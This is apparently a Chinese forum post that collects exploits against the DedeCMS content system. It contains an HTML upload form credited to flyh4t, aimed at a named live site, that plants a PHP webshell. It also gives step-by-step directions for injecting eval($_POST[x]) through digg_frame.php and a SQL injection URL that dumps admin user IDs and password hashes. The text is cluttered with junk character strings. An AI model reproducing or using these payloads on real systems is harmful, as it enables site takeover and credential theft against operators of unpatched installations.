/ f4 ^4 a9 Y3 m+ [( ]  b# C8 q" x8 [* P/ \" D
9 [! @/ t2 c* U4 n5 i

3 D- Z: ~0 j0 @4 ~; P
4 v6 [6 W: P. T% G6 `) Y1 p1 e# m% p- @1 N8 d
1 C- h  w* g! `' A
) Q" F$ a3 I0 _  d
% U4 s  ^( a5 Q
) \% D/ K: f+ Z4 N. u5 w8 |
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
/ o  v% o+ ~7 @+ t! A3 n: O$ r<html>; B1 ^: f# a8 M! b
<head>
; W% Q/ V. F) Q! D% n' q# B+ ]<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
0 n( W4 o4 I* W</head>
3 @  p' q$ r' w; n<body style="FONT-SIZE: 9pt">
( D1 ?( \# Q' z2 X---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. _4 r9 C+ m, X. R
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
2 H+ h& w& E# J: {<input type='hidden' name='activepath' value='/data/cache/' />% p4 S. |% [; c5 C+ S
<input type='hidden' name='cfg_basedir' value='../../' />5 s) O" \; X! @. k9 b, y4 p
<input type='hidden' name='cfg_imgtype' value='php' />6 \7 q2 w7 g0 A0 I; L" p9 H5 |
<input type='hidden' name='cfg_not_allowall' value='txt' />, D  P1 |/ |5 ?1 W- S( t4 {" F
<input type='hidden' name='cfg_softtype' value='php' />
# h4 Z, ?& K; a( F. ]<input type='hidden' name='cfg_mediatype' value='php' />/ H" D; V) Q8 ~2 `6 q
<input type='hidden' name='f' value='form1.enclosure' />9 ]3 x9 h0 t% J, w! Z
<input type='hidden' name='job' value='upload' />, R# q) X* ?5 X1 R7 C2 Q
<input type='hidden' name='newname' value='fly.php' />
8 z7 S, q4 L1 O, A1 q0 Y* ~' }Select U Shell <input type='file' name='uploadfile' size='25' />
$ O  t* a% X' N4 H) b2 D2 [<input type='submit' name='sb1' value='确定' />
7 ?8 g( u  v$ S+ _</form>$ b9 c& a5 s7 v6 H7 h' e* e! y
<br />It's just a exp for the bug of Dedecms V55...<br />
1 l6 D  i& o" w4 bNeed register_globals = on...<br />
# x( x) w/ ^# V! d4 ?Fun the game,get a webshell at /data/cache/fly.php...<br />
5 h4 M7 @3 H; f: N</body>2 U) p* ~) N/ d9 J
</html>
2 p+ I# A* b; z# Z' ]3 s0 v
" R" Z& _+ q; c) `) h  `" s9 \2 q+ i" R  d" Y

$ P: x! u! }6 Y7 F: D; q8 }) g
1 k1 B( k3 M# K; W
% D$ ]4 g9 H* d$ r; Q0 ~$ P8 M
* v$ z: G9 M, Z8 N9 c. U+ U5 v

" \( V* r. |5 @# V  W9 i0 W5 ^, `

& x3 k! I" G5 |3 `织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞6 P6 K; ~$ [  P6 U4 w$ Y" b& F" y
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
( r& G# J6 h7 n0 J8 x1. 访问网址:
& l- m7 p0 V) p1 D# q
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>% r. e  C1 J- t: B1 o6 Q
可看见错误信息2 C* n8 o* `( N& [4 W9 e7 C6 M; T

% A" f1 W, O4 R7 c  U. X
9 n/ q4 [+ b+ c& M- [2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
. X7 b4 x- [. a) z5 s8 g) Nint(3) Error: Illegal double '1024e1024' value found during parsing
5 j/ [) t- L" U( Q( {Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
+ E- o$ H+ K" [) u( B" I1 X2 T( x5 f+ r( M* Y

, C* ~" L( o8 B9 U3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
0 s# f! O: z8 d) g1 H& i! ?/ S
3 D* i, q" I5 N- T# d1 Q- }$ A+ Y8 l+ W
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
# h; s2 ]: g0 C
  J  i# q; k! }% p" U7 d# z9 e9 S  a+ S) `/ ^- f1 `. z! ~
按确定后的看到第2步骤的信息表示文件木马上传成功.
7 b! U7 {; r2 C0 c. `! O' E  h6 V; t$ \

% x0 E) ^! u4 C- n4 A) m" [- p7 k2 f7 B. W( ]$ N2 n' l% r; U. U; |

& e" S3 ?$ d. ?: ^3 w6 P! j) D- }, j. m( X0 g7 b7 s8 L$ N  w
4 u( {. A. V- D1 p. G- B

" |0 k4 t+ D4 W4 G3 ]& x0 p4 _/ a" @
' Y/ d1 L. h5 v

* T2 I) l2 v% Q! U7 ~
# I: X( Q! X$ X7 w/ T
% Z$ n) O9 ]$ t7 F/ U织梦(DedeCms)plus/infosearch.php 文件注入漏洞
  R( x4 j1 o  ]$ [http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表